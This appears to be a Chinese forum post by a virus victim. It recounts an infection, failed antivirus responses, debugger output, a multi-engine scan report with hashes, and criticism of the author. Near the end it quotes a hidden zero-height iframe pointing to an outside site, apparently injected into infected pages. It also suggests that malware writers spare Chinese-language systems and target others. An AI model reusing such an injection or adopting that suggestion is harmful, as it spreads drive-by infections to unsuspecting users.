。。
中了毒。。我都不知道在哪里中毒的。。。上过。我记得上过卡饭。下来后去过狗狗 。。。。也许从狗狗中的。。。
在机器反映有问题的一瞬间。马上开启雨伞。。2分钟。后。。雨伞没反应。。速度继续变慢。。接着开启金山的防御。。还是没反应。杀看进程。发现一个瑞星的系统进程占CPU45%左右。。网络连接数据不断 马上开启 360看网络链接 。打开后系统速度更慢了。马上断开网络连接。。没反应。。。继续打开后系统 非常慢 随即打开E盘。。 看到了图标。赶快关闭。 防御都失效了。关闭360 ,开卡巴杀。先杀引导区和内存。然后开瑞星杀E盘。金山毒霸杀D盘。。。瑞星杀了半天一个文件都没开始扫描。金山查了1000多个文件查不出来。卡巴在引导区和内存区杀了8个系统自己重新启动了。。。。上来后。继续杀。
瑞星有反应了。速度没卡巴速度快 。不过杀到了9个有一个好像是被感染的HTM。。。。然后再也没有能杀到过。。卡巴没有试。。瑞星带杀毒。也许可以恢复文件。别的都是杀到了就删除。。。发现病毒有问题 。所以马上结束。关机。换硬盘。。这样才没加重感染
一会硬盘恢复被杀毒杀掉的启动病毒。看从哪里来的。要做些什么。
感染了一大部分文件。。。。发现及时。。
救回来一部分文件。。。。可怜的文件。。。
此病毒还未成熟。
发现及时处理得当。 未大面积感染
有些地方不明白。。有时候这能感染文件夹里面的东西有时候不能感染。。。。
。我觉得我的被感染的TXT文件里面的内容应该不在了。别的EXE软件可能还有希望恢复。
唉·
做黑客。你要的是什么?
别人崇拜你?。
人人骂你?
还是破坏了大部分无辜人的系统你有什么好处???
。。不知道你是不是因为 熊猫后传 你才出来做这个损人不利己的病毒。。。你
也许是听说做熊猫病毒的被国家重用了吧。。
说说这个病毒。。。
1.不能破坏加壳的文件。。。做杀毒的要会做病毒。 反之做病毒的要学会做杀毒。
不知道有没有把免疫做出来。还是直接在你的虚拟机上就传播了
比较 老的感染者了。
2.中毒感染。你的发病速度很快。很让人惊讶。不可否认。。你的病毒太大。。180K左右。。
1W个文件感染下去。。。花多长时间 。。。也许当时我的电脑在紧张运行中。。
因为这个感染是所有文件。。所以感染效率最重要。
不知道这个病毒里面有没有杀防火墙和主动防御的进程。在我发现不对劲的情况下 瑞星的雨伞毫无反应。。
接着开金山的。。。也没反应。。卡巴。没开 打开360.。结果当掉了。。。。。
内存吃到1G多了。。。CPU 99%左右晃动。。
3.逃过了主动防御。。。。结束了系统的进程。。就这点还算过了 免杀技术。。金山的防御能杀掉 瑞星的卡在那里不动。360的也卡着不动。。不是完全卡死。
4.你的病毒的启动机制有问题。。。杀掉自动播放唯一的启动你就没戏了。
。还不知道有没有别的感染方式。。更不知道下载了那些文件。也许会查出来。
5.是病毒重新启动电脑的吧。 不知道有什么用。。。是不是我关闭了 EXPLORER.就不能继续了。然后重新启动。我记得。杀毒软件还在杀,不会是杀毒。。CPU的温度还没达到重启的温度。
系统盘目测暂时无文件被感染 。。。因为没有能杀到此病毒的软件。。所以目测。。
。。怀疑是下载者和蠕虫病毒的变种。。。。。。下载一个文件。然后执行 先解决杀毒软件。然后下载蠕虫。。蠕虫做的很差。。也许是杀毒软件干扰工作吧。。。。不应该。。。杀毒软件都查不到。自身复制。就不困难了。感染。。需要时间。。一口气吃掉整块硬盘。。不太可能。不知道1K的蠕虫速度是不是能加快点。太小了免杀不好做那样可能 就不能感染了。。
。。个人角度看问题。这个1.商业用途。。。怎么用。也许是先感染一批用户。让势力大起来。然后受到重视。在能带来利益。。。如果这样想的。那就不好说了。
感染进来就修改图标。。。图标效果不错。非常强大。。最大一个站60多K。图标组合就不小。用了点心来截图了吧。。呵呵。增加了文件的大小。不知道你怎么想的。---------------为了炫耀的家伙。。可能是为了引起别人的注意。。。要谁注意就不知道了。。。已经有了一个熊猫了。。我没中过听说功能强大。所以不缺少你一个。
7C921FAE C705 A4D3977C 40>mov dword ptr ds:[7C97D3A4],7C97E140 ; UNICODE "C:\WINDOWS\system32"
7C921E8F C785 60FFFFFF E8>mov dword ptr ss:[ebp-A0],7C97DEE8 ; UNICODE "C:\WINDOWS\system32\ntdll.dll"
7C921E2F 68 00000100 push 10000 ; UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"
7C954926 68 9649957C push 7C954996 ; ASCII "AVRF: Checking %ws for duplicate (%ws: %s)
"
7C955EBE C706 E058957C mov dword ptr ds:[esi],7C9558E0
7C955EC4 FF77 30 push dword ptr ds:[edi+30]
7C955EC7 68 3C61957C push 7C95613C ; ASCII "Snapped (%ws) HeapCreate ...
"
7C955ECC E9 FD010000 jmp 7C9560CE
7C955ED1 3D D405917C cmp eax,7C9105D4
7C955ED6 75 13 jnz short 7C955EEB
7C955ED8 C706 2F56957C mov dword ptr ds:[esi],7C95562F
7C955EDE FF77 30 push dword ptr ds:[edi+30]
7C955EE1 68 5C61957C push 7C95615C ; ASCII "Snapped (%ws) RtlAllocateHeap ...
7C955EFB 68 8061957C push 7C956180 ; ASCII "Snapped (%ws) RtlReAllocateHeap ...
7C955F11 68 A861957C push 7C9561A8 ; ASCII "Snapped (%ws) RtlFreeHeap
7C955F2C 68 C861957C push 7C9561C8 ; ASCII "Snapped (%ws) HeapAlloc ...
看来还费了点心做这个。。。不过还是有少数杀软不过。。。
PE也改乱了。·我就不运行看能不能运行了。可能效率差点。
一会看硬盘有多少文件中了。。。
好像在哪里见过这样的姿势。手举起来。然后上面一个"有"字
看图吧。。 这些是我 换硬盘后到原始硬盘中 截下来的
文件 ll.txt.exe 接收于 2008.05.11 17:38:14 (CET)
当前状态: 完成
结果: 5/31 (16.13%)
格式化文本 打印结果
反病毒引擎 版本 最后更新 扫描结果
AhnLab-V3 2008.5.10.0 2008.05.10 -
AntiVir 7.8.0.17 2008.05.09 TR/Crypt.NSAnti.Gen
Authentium 4.93.8 2008.05.10 -
Avast 4.8.1169.0 2008.05.10 -
AVG 7.5.0.516 2008.05.11 -
BitDefender 7.2 2008.05.08 -
CAT-QuickHeal 9.50 2008.05.10 -
ClamAV 0.92.1 2008.05.11 -
DrWeb 4.44.0.09170 2008.05.10 -
eSafe 7.0.15.0 2008.05.07 suspicious Trojan/Worm
eTrust-Vet 31.4.5771 2008.05.08 -
Ewido 4.0 2008.05.11 -
F-Prot 4.4.2.54 2008.05.10 -
F-Secure 6.70.13260.0 2008.05.10 -
Fortinet 3.14.0.0 2008.05.11 -
Ikarus T3.1.1.26.0 2008.05.11 -
Kaspersky 7.0.0.125 2008.05.11 -
McAfee 5291 2008.05.08 -
Microsoft 1.3408 2008.05.11 VirTool:Win32/Obfuscator.A
NOD32v2 3090 2008.05.09 -
Norman 5.80.02 2008.05.09 -
Panda 9.0.0.4 2008.05.11 -
Prevx1 V2 2008.05.11 -
Rising 20.43.62.00 2008.05.11 -
Sophos 4.29.0 2008.05.11 -
Sunbelt 3.0.1097.0 2008.05.07 VIPRE.Suspicious
Symantec 10 2008.05.11 -
TheHacker 6.2.92.307 2008.05.11 -
VBA32 3.12.6.5 2008.05.11 -
VirusBuster 4.3.26:9 2008.05.10 -
Webwasher-Gateway 6.6.2 2008.05.09 Trojan.Crypt.NSAnti.Gen
附加信息
File size: 184320 bytes
MD5...: aed117d9abd3478fcbd1b8fef082d154
SHA1..: eef57810ebb28838c5b856e893e7eac8e4e2bdae
SHA256: 72b57360fbc15d02cee898654bb4a482bb75d06954c0a56473be743861baa1dd
SHA512: 85433eb8d369c4553231fca03da02de1058951f196b3c9bb402ae2f99632c232
9e7d602eb547461ed39434a2717e1bd8ec38122a675c6b33ab3ffd16e79b5497
PEiD..: -
PEInfo: PE Structure information
( base data )
entrypointaddress.: 0x131b75e5
timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
machinetype.......: 0x14c (I386)
( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.nsp0 0x1000 0x45000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.nsp1 0x46000 0x3c000 0x3b400 6.37 ca71517157685aeeed5ba2fee48d4a4f
.nsp2 0x82000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
( 10 imports )
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
> user32.dll: GetKeyboardType
> advapi32.dll: RegQueryValueExA
> oleaut32.dll: SysFreeString
> kernel32.dll: TlsSetValue
> user32.dll: MessageBoxA
> kernel32.dll: WriteFile
> kernel32.dll: Sleep
> oleaut32.dll: SafeArrayPtrOfIndex
> advapi32.dll: OpenSCManagerA
( 0 exports )
packers (Kaspersky): PE_Patch
自己动手丰衣足食。。。。。。。唉!·
不要害人了。。现在。。。。要黑你就加个识别系统语言的病毒代码。。不要是中文就行了。。
作为一个爱国的想法。
最好是不要传播了。。做软件多好呀。何必做成病毒。
不说了。。。。。。。不知道文件能不能恢复。。。。文件类型还是可以区分的。 我这里还有好几百个。希望能恢复。。。
····可怜
iframe src='http://www.dadayouxi.net/index.htm' width=100 height=0
用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CH; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
